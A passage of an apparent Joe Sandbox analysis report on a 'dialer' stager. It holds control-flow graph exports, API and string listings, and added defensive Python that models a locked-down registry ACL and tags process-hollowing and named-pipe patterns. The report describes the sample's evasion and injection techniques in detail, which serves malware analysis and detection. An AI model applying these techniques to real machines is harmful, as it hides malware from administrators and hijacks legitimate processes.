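         "SD": {"delete"}, "WD": {"write_dac"}, "WO": {"write_owner"}, "RC": {"read_control"}}
SID_ALIAS = {"SY": "S-1-5-18", "BA": "S-1-5-32-544", "BU": "S-1-5-32-545",
             "AU": "S-1-5-11", "WD": "S-1-1-0"}

# Constructed descriptors (assumption, the report does not show the real one): a key locked down to
# LocalSystem with inheritance cut off, versus the shape of an ordinary HKLM\SOFTWARE subkey.
MALWARE_SDDL = "O:SYG:SYD:P(A;CI;KA;;;SY)"
BASELINE_SDDL = "D:(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;KR;;;BU)"
# Constructed token SID sets: the group SIDs a caller of each kind would carry in its access token.
SYSTEM_TOKEN = {"S-1-5-18"}
ADMIN_TOKEN = {"S-1-5-32-544", "S-1-5-11", "S-1-1-0"}
USER_TOKEN = {"S-1-5-32-545", "S-1-5-11", "S-1-1-0"}


def _pairs(s):
    """SDDL flag and rights fields are two-letter codes concatenated without separators."""
    return [s[i:i + 2] for i in range(0, len(s), 2)]


def parse_sddl(sddl):
    """Split the O:/G:/D:/S: components and decode every ACE of the DACL into a dict."""
    parts = dict(re.findall(r"([OGDS]):(.*?)(?=[OGDS]:|$)", sddl))
    dacl = parts.get("D", "")
    control = dacl.split("(", 1)[0]          # DACL control flags before the first ACE: P, AI, AR
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", dacl):
        fields = ace.split(";")
        if len(fields) != 6:
            raise ValueError("malformed ACE: " + ace)
        kind, flags, rights, _object_guid, _inherit_guid, sid = fields
        if rights.startswith("0x"):          # raw access mask: keep it opaque rather than guess
            expanded = {rights}
        else:
            expanded = set().union(*(RIGHT.get(r, {r}) for r in _pairs(rights)))
        aces.append({"type": ACE_TYPE.get(kind, kind),
                     "flags": [ACE_FLAG.get(f, f) for f in _pairs(flags)],
                     "rights": expanded,
                     "sid": SID_ALIAS.get(sid, sid)})
    owner = parts.get("O", "")
    return {"owner": SID_ALIAS.get(owner, owner),
            "protected": "P" in control,     # P: no ACEs are inherited from the parent key
            "aces": aces}


def access_check(sd, token_sids, wanted):
    """Ordered ACE walk as the kernel does it: a deny ACE touching a still-unsatisfied right fails the
    check, allow ACEs satisfy rights until none remain; an empty DACL grants nothing."""
    remaining = set(wanted)
    if sd["owner"] in token_sids:            # the owner always keeps READ_CONTROL and WRITE_DAC
        remaining -= {"read_control", "write_dac"}
    for ace in sd["aces"]:
        if ace["sid"] not in token_sids or "inherit_only" in ace["flags"]:
            continue
        if ace["type"] == "deny" and ace["rights"] & remaining:
            return False
        if ace["type"] == "allow":
            remaining -= ace["rights"]
            if not remaining:
                return True
    return not remaining


def who_can(sd, right):
    """Which well-known principals, holding only their own SID, can exercise `right` on the key."""
    return sorted(alias for alias, sid in SID_ALIAS.items() if access_check(sd, {sid}, {right}))


if __name__ == "__main__":
    for label, sddl in (("locked-down", MALWARE_SDDL), ("baseline", BASELINE_SDDL)):
        sd = parse_sddl(sddl)
        print(label, "protected=%s delete=%s read=%s" % (sd["protected"], who_can(sd, "delete"), who_can(sd, "read")))
```

With the locked-down descriptor an administrator cannot read or delete the key, which is what a stager wants for the value it later deletes with RegDeleteValueW. The check is a model of the DACL only: a member of Administrators can still seize the key through SeTakeOwnershipPrivilege, and anything running as LocalSystem (the account the sample's own service string dialersvc64 suggests) passes the SY ACE, so remediation is done from a SYSTEM context or after taking ownership.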

                                                        Control-flow Graph

Raw control_flow_graph export, joined where the export broke it across lines: each block is an id followed by its address range and API calls (or call <address> for an internal call), each edge is id->id. The executed/not-executed colouring of the original graph image is not recoverable from this export.
control_flow_graph 189 140002560-14000258c 190 140002592 189->190 191 14000273a-140002742 189->191 192 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 190->192 193 140002598-14000259f 190->193 194 140002748-14000274b 191->194 195 14000297e-1400029a2 ReadFile 191->195 196 140002a74-140002a8e 192->196 198 140002704-140002715 192->198 199 1400025a5-1400025a8 193->199 200 1400026bd-1400026bf ExitProcess 193->200 201 140002751-140002756 194->201 202 140002974-140002979 call 14000175c 194->202 195->196 197 1400029a8-1400029af 195->197 197->196 206 1400029b5-1400029c9 call 1400018ac 197->206 198->196 207 14000271b-140002733 call 1400010c0 198->207 208 1400025ae-1400025b1 199->208 209 140002660-14000268b RegOpenKeyExW 199->209 203 140002919-14000292c call 140001944 201->203 204 14000275c-14000275f 201->204 202->196 203->196 231 140002932-140002941 call 140001944 203->231 210 140002761-140002766 204->210 211 14000279d-1400027ae call 140001944 204->211 206->196 229 1400029cf-1400029d5 206->229 232 140002735 207->232 218 140002651-14000265b 208->218 219 1400025b7-1400025ba 208->219 216 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 209->216 217 14000268d-14000269b RegDeleteValueW 209->217 210->196 220 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 210->220 211->196 240 1400027b4-1400027d6 ReadFile 211->240 216->196 217->216 218->196 226 140002644-14000264c 219->226 227 1400025c0-1400025c5 219->227 226->196 227->196 234 1400025cb-1400025ef ReadFile 227->234 238 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 229->238 239 140002a5f 229->239 231->196 255 140002947-14000296f ShellExecuteW 231->255 232->196 234->196 236 1400025f5-1400025fc 234->236 236->196 243 140002602-140002616 call 1400018ac 236->243 258 140002a18-140002a1e 238->258 259 140002a49-140002a4f GetProcessHeap 238->259 245 140002a66-140002a6f call 140002a90 239->245 240->196 247 1400027dc-1400027e3 240->247 243->196 264 14000261c-140002622 243->264 245->196 247->196 254 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 247->254 260 14000290b-140002914 GetProcessHeap 254->260 261 14000282d-140002839 254->261 255->196 258->259 265 140002a20-140002a32 258->265 262 140002a52-140002a5d HeapFree 259->262 260->262 261->260 266 14000283f-14000284b 261->266 262->196 268 140002624-140002633 call 1400010c0 264->268 269 140002638-14000263f 264->269 270 140002a34-140002a36 265->270 271 140002a38-140002a40 265->271 266->260 272 140002851-14000285c 266->272 268->196 269->245 270->271 276 140002a44 call 1400016cc 270->276 271->259 277 140002a42 271->277 273 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 272->273 274 14000285e-140002869 272->274 273->260 274->260 278 14000286f-14000287c call 140001c88 274->278 276->259 277->265 278->260
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                        • String ID: SOFTWARE$dialerstager$open
                                                        • API String ID: 3276259517-3931493855
                                                        • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                        • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                        • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                        • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

                                                        Control-flow Graph

Blocks as id: address range, API calls; edges as id->id. The executed/not-executed colouring of the original graph image is not recoverable from this export.
• 285: 140001c88-140001cb8
• 286: 140001cbb-140001cc8
• 287: 140001e8c-140001e91
• 288: 140001cce-140001d25, CreateProcessW
• 289: 140001e88
• 290: 140001d2b-140001d5a, VirtualAllocEx
• 291: 140001e97
• 292: 140001e5d-140001e60
• 293: 140001d60-140001d7b, WriteProcessMemory
• 294: 140001e99-140001eb9
• 295: 140001e62-140001e76, OpenProcess
• 296: 140001e85
• 297: 140001d81-140001d87
• 298: 140001e78-140001e83, TerminateProcess
• 299: 140001dd2-140001def, VirtualAlloc
• 300: 140001d89
• 301: 140001df1-140001e07, GetThreadContext
• 302: 140001d8c-140001dba, WriteProcessMemory
• 303: 140001dc0-140001dcc
• 304: 140001e09-140001e2e, WriteProcessMemory
• 305: 140001dce
• 306: 140001e30-140001e4c, SetThreadContext
• 307: 140001e4e-140001e5b, ResumeThread
• 308: 140001eba-140001ebf
Edges: 285->286, 286->287, 286->288, 287->286, 287->291, 288->289, 288->290, 289->287, 290->292, 290->293, 291->294, 292->295, 292->296, 293->292, 293->297, 295->289, 295->298, 296->289, 297->299, 297->300, 298->289, 299->292, 299->301, 300->302, 301->292, 301->304, 302->292, 302->303, 303->302, 303->305, 304->292, 304->306, 305->299, 306->292, 306->307, 307->292, 307->308, 308->294
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                        • String ID: @
                                                        • API String ID: 3462610200-2766056989
                                                        • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                        • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                        • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                        • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
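The control-flow graphs in this part of the report (the named-pipe server at 1400021d0, blocks 129-139; the K32EnumProcesses/SleepEx sweep at 140002b38, blocks 149-160; and the CreateProcessW, VirtualAllocEx, WriteProcessMemory, GetThreadContext, SetThreadContext, ResumeThread function at 140001c88 above, blocks 285-308) are machine exports, and reading a loop or an API sequence out of them by eye is slow. The Python below is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: it parses that export format, recovers the natural loops from DFS back edges, and tags the API pattern each function implements. The three dump strings are copied from the report; the token grammar (block id, address or address range, API names or call <address>, edges as id->id) is inferred from those dumps, and the technique signatures are the editor's own choice.

```python
"""Parse Joe Sandbox control_flow_graph exports, recover loops and tag API patterns (added example)."""
import re
from collections import defaultdict

# Exports copied verbatim from the report: named-pipe server, process sweep, thread-context hijack.
PIPE_CFG = ("control_flow_graph 129 1400021d0-1400021da 130 1400021dd-1400021f0 call 140001b54 129->130 "
            "133 1400021f2-1400021fb Sleep 130->133 134 1400021fd-14000220a ConnectNamedPipe 130->134 133->130 "
            "135 140002241-140002246 Sleep 134->135 136 14000220c-14000220d ReadFile 134->136 "
            "137 14000224c-140002255 DisconnectNamedPipe 135->137 136->137 138 14000222f-140002234 136->138 "
            "137->134 138->137 139 140002236-14000223f 138->139 139->137")
SWEEP_CFG = ("control_flow_graph 149 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc "
             "150 140002b8e-140002ba1 K32EnumProcesses 149->150 151 140002ba3-140002bb2 150->151 "
             "152 140002beb-140002bf4 SleepEx 150->152 153 140002bb4-140002bb8 151->153 154 140002bdc-140002be7 "
             "151->154 152->150 155 140002bba 153->155 156 140002bcb-140002bce call 140002540 153->156 "
             "157 140002bbe-140002bc3 155->157 160 140002bd2 156->160 158 140002bc5-140002bc9 157->158 "
             "159 140002bd6-140002bda 157->159 158->156 158->157 159->153 159->154 160->159")
HOLLOW_CFG = ("control_flow_graph 285 140001c88-140001cb8 286 140001cbb-140001cc8 285->286 287 140001e8c-140001e91 "
              "286->287 288 140001cce-140001d25 CreateProcessW 286->288 287->286 291 140001e97 287->291 "
              "289 140001e88 288->289 290 140001d2b-140001d5a VirtualAllocEx 288->290 289->287 "
              "292 140001e5d-140001e60 290->292 293 140001d60-140001d7b WriteProcessMemory 290->293 "
              "294 140001e99-140001eb9 291->294 295 140001e62-140001e76 OpenProcess 292->295 296 140001e85 292->296 "
              "293->292 297 140001d81-140001d87 293->297 295->289 298 140001e78-140001e83 TerminateProcess 295->298 "
              "296->289 299 140001dd2-140001def VirtualAlloc 297->299 300 140001d89 297->300 298->289 "
              "301 140001df1-140001e07 GetThreadContext 299->301 302 140001d8c-140001dba WriteProcessMemory 300->302 "
              "301->292 304 140001e09-140001e2e WriteProcessMemory 301->304 302->292 303 140001dc0-140001dcc 302->303 "
              "303->302 305 140001dce 303->305 304->292 306 140001e30-140001e4c SetThreadContext 304->306 305->299 "
              "306->292 307 140001e4e-140001e5b ResumeThread 306->307 307->292 308 140001eba-140001ebf 307->308 308->294")

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_ADDR = re.compile(r"^[0-9a-f]{6,}(?:-[0-9a-f]{6,})?$")   # a block start address or start-end range
SIGNATURES = {  # API sets that characterise a technique (editor's choice, not a Joe Sandbox signature)
    "process hollowing (thread-context hijack)": {"CreateProcessW", "VirtualAllocEx", "WriteProcessMemory",
                                                   "GetThreadContext", "SetThreadContext", "ResumeThread"},
    "named-pipe server loop": {"ConnectNamedPipe", "ReadFile", "DisconnectNamedPipe"},
    "process enumeration sweep": {"K32EnumProcesses"},
    "WoW64 architecture check": {"OpenProcess", "IsWow64Process"},
}


def parse_cfg(dump):
    """Tokenise one export into nodes {id: {"range", "calls"}} and an ordered edge list [(src, dst)]."""
    tokens = dump.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    nodes, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok, m = tokens[i], _EDGE.match(tokens[i])
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
        elif tok.isdigit() and i + 1 < len(tokens) and _ADDR.match(tokens[i + 1]):
            current = int(tok)                       # new block: id followed by its address range
            nodes[current] = {"range": tokens[i + 1], "calls": []}
            i += 1
        elif current is None:
            raise ValueError("call label before any block: " + tok)
        elif tok == "call" and i + 1 < len(tokens):  # internal call, keep target with the label
            nodes[current]["calls"].append("call " + tokens[i + 1])
            i += 1
        else:
            nodes[current]["calls"].append(tok)     # imported API name
        i += 1
    return nodes, edges


def natural_loops(nodes, edges):
    """DFS from the entry block finds back edges; each is expanded to its natural loop body."""
    succ, pred = defaultdict(list), defaultdict(list)
    for s, d in edges:
        succ[s].append(d)
        pred[d].append(s)
    back, on_path, done = [], [], set()

    def dfs(n):
        on_path.append(n)
        for d in succ[n]:
            if d in on_path:
                back.append((n, d))                  # edge to an ancestor on the current DFS path
            elif d not in done:
                dfs(d)
        on_path.pop()
        done.add(n)

    dfs(min(nodes))
    loops = []
    for tail, header in back:                        # walk predecessors from the tail up to the header
        body, work = {header, tail}, [tail]
        while work:
            for p in pred[work.pop()]:
                if p not in body:
                    body.add(p)
                    work.append(p)
        apis = {c for b in body for c in nodes[b]["calls"] if not c.startswith("call ")}
        loops.append({"header": header, "body": sorted(body), "apis": sorted(apis)})
    return loops


def analyze(dump):
    """Block count, imported APIs, matching technique tags and loops for one exported function."""
    nodes, edges = parse_cfg(dump)
    apis = {c for n in nodes.values() for c in n["calls"] if not c.startswith("call ")}
    return {"blocks": len(nodes), "apis": sorted(apis),
            "techniques": [name for name, sig in SIGNATURES.items() if sig <= apis],
            "loops": natural_loops(nodes, edges)}


if __name__ == "__main__":
    for name, dump in (("pipe", PIPE_CFG), ("sweep", SWEEP_CFG), ("hollow", HOLLOW_CFG)):
        r = analyze(dump)
        print(name, r["techniques"], [(l["header"], l["apis"]) for l in r["loops"]])
```

The loop bodies are the part worth reading: for the pipe server the loop headed at block 134 contains ConnectNamedPipe, ReadFile, DisconnectNamedPipe and Sleep, i.e. a serve-one-client-then-disconnect server; for the sweep the loop headed at block 150 contains K32EnumProcesses and SleepEx, a polling process watch; and for the hollowing function the tight loop over blocks 302-303 contains only WriteProcessMemory, the per-section copy into the suspended target. An analyst's rule that keys on the executed colouring cannot be reproduced from this export, so the code deliberately reports structure only.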
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                        • String ID: dialersvc64
                                                        • API String ID: 4184240511-3881820561
                                                        • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                        • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                        • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                        • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Delete$CloseEnumOpen
                                                        • String ID: SOFTWARE\dialerconfig
                                                        • API String ID: 3013565938-461861421
                                                        • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                        • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                        • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                        • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: File$Write$CloseCreateHandle
                                                        • String ID: \\.\pipe\dialercontrol_redirect64
                                                        • API String ID: 148219782-3440882674
                                                        • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                        • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                        • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                        • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000003F.00000002.2793360053.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000003F.00000002.2793210159.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000003F.00000002.2793542824.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000003F.00000002.2793753328.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: ntdll.dll
                                                        • API String ID: 1646373207-2227199552
                                                        • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                        • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                        • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                        • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                        Execution Graph

                                                        Execution Coverage:2.2%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:897
                                                        Total number of Limit Nodes:2
calls 2925->2926 2927 14000146d 2926->2927 2928 140001394 2 API calls 2927->2928 2929 14000147c 2928->2929 2930 140001394 2 API calls 2929->2930 2931 14000148b 2930->2931 2932 140001394 2 API calls 2931->2932 2933 14000149a 2932->2933 2934 140001394 2 API calls 2933->2934 2935 1400014a9 2934->2935 2936 140001394 2 API calls 2935->2936 2937 1400014b8 2936->2937 2938 140001394 2 API calls 2937->2938 2939 1400014c7 2938->2939 2940 140001394 2 API calls 2939->2940 2941 1400014d6 2940->2941 2942 1400014e5 2941->2942 2943 140001394 2 API calls 2941->2943 2944 140001394 2 API calls 2942->2944 2943->2942 2945 1400014ef 2944->2945 2946 1400014f4 2945->2946 2947 140001394 2 API calls 2945->2947 2948 140001394 2 API calls 2946->2948 2947->2946 2949 1400014fe 2948->2949 2950 140001503 2949->2950 2951 140001394 2 API calls 2949->2951 2952 140001394 2 API calls 2950->2952 2951->2950 2953 14000150d 2952->2953 2954 140001394 2 API calls 2953->2954 2955 140001512 2954->2955 2956 140001394 2 API calls 2955->2956 2957 140001521 2956->2957 2958 140001394 2 API calls 2957->2958 2959 140001530 2958->2959 2960 140001394 2 API calls 2959->2960 2961 14000153f 2960->2961 2962 140001394 2 API calls 2961->2962 2963 14000154e 2962->2963 2964 140001394 2 API calls 2963->2964 2965 14000155d 2964->2965 2966 140001394 2 API calls 2965->2966 2967 14000156c 2966->2967 2968 140001394 2 API calls 2967->2968 2969 14000157b 2968->2969 2970 140001394 2 API calls 2969->2970 2971 14000158a 2970->2971 2972 140001394 2 API calls 2971->2972 2973 140001599 2972->2973 2974 140001394 2 API calls 2973->2974 2975 1400015a8 2974->2975 2976 140001394 2 API calls 2975->2976 2977 1400015b7 2976->2977 2978 140001394 2 API calls 2977->2978 2979 1400015c6 2978->2979 2980 140001394 2 API calls 2979->2980 2981 1400015d5 2980->2981 2982 140001394 2 API calls 2981->2982 2983 1400015e4 2982->2983 2984 140001394 2 API calls 2983->2984 2985 1400015f3 2984->2985 2985->2362

                                                        Callgraph

                                                        callgraph (rendered as text; legend and edge list omitted): 110 functions, Function_0000000140001000 through Function_00000001400064F1. Function_0000000140001000 calls Function_0000000140001E00, Function_0000000140001750, Function_0000000140001FB0 and Function_0000000140001FC0. Function_0000000140003240 and Function_00000001400027D0 call into most of the stub functions in the range Function_0000000140001404 through Function_00000001400015A8; each of those stubs calls Function_0000000140001394, which in turn calls Function_0000000140006900 and Function_0000000140006650.

                                                        Control-flow Graph

                                                        APIs
                                                        • NtOpenKeyTransactedEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: OpenTransacted
                                                        • String ID:
                                                        • API String ID: 1720269262-0
                                                        • Opcode ID: 547cd5761d4914845fa6ae388515c3c7ace98cea1eaf7b6cf35d4268a46e5783
                                                        • Instruction ID: 2cf5c700162fe594e1d2732e7ea8d53bfaf5a5c266b4abc5d19d3bc339ccaa33
                                                        • Opcode Fuzzy Hash: 547cd5761d4914845fa6ae388515c3c7ace98cea1eaf7b6cf35d4268a46e5783
                                                        • Instruction Fuzzy Hash: 22F09DB2608B408AEA12DB62F85179A77A5F38C7C0F009919BBD853735DB38C190CB40

                                                        Control-flow Graph

                                                        control_flow_graph for 0x1400027d0 (rendered as text; legend and edge list omitted): basic blocks from 0x1400027d0 through 0x140002fe4; calls memset, wcsncmp, wcscpy, wcscat, wcslen and the internal functions 0x140002660, 0x14000155d, 0x1400014c7, 0x140001503, 0x140006640, 0x140001370, 0x1400014e5, 0x1400014a9, 0x1400014f4, 0x14000145e and 0x140001512.
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                        • String ID: 0$X$\BaseNamedObjects\fmfuvuvubhulhbmi$`
                                                        • API String ID: 780471329-2221759706
                                                        • Opcode ID: b88068f1fe9cc8f588b577293ec80b011b8d976e1a7436dbacaa54201d0b1de5
                                                        • Instruction ID: 741ed5e485bbd100f929632303db2b81d3387a094c7d1780bec0f195da92c41a
                                                        • Opcode Fuzzy Hash: b88068f1fe9cc8f588b577293ec80b011b8d976e1a7436dbacaa54201d0b1de5
                                                        • Instruction Fuzzy Hash: 7F125AB2608BC481E762CB26F8443EAB7A4F789794F414215EBA957BF5DF78C189C700

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                        • String ID:
                                                        • API String ID: 2643109117-0
                                                        • Opcode ID: 9680da81ef9b41a8ca86ed20d1c3f39e20f6fb5cda03ac55c3df714a2b55688c
                                                        • Instruction ID: 04f373412a7efe9cc2b583252cf444471ad5a1af98637eab46a93e3fe04a9f05
                                                        • Opcode Fuzzy Hash: 9680da81ef9b41a8ca86ed20d1c3f39e20f6fb5cda03ac55c3df714a2b55688c
                                                        • Instruction Fuzzy Hash: C151F1F1611A4085FA16EF67F9947EA27A1AB8CBD0F449125FB4E873B2DE3884958700

                                                        Control-flow Graph

                                                        control_flow_graph for 0x140006650 (rendered as text; legend and edge list omitted): basic blocks from 0x140006650 through 0x1400068f8; calls malloc and, repeatedly, the internal function 0x140006640.
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmp
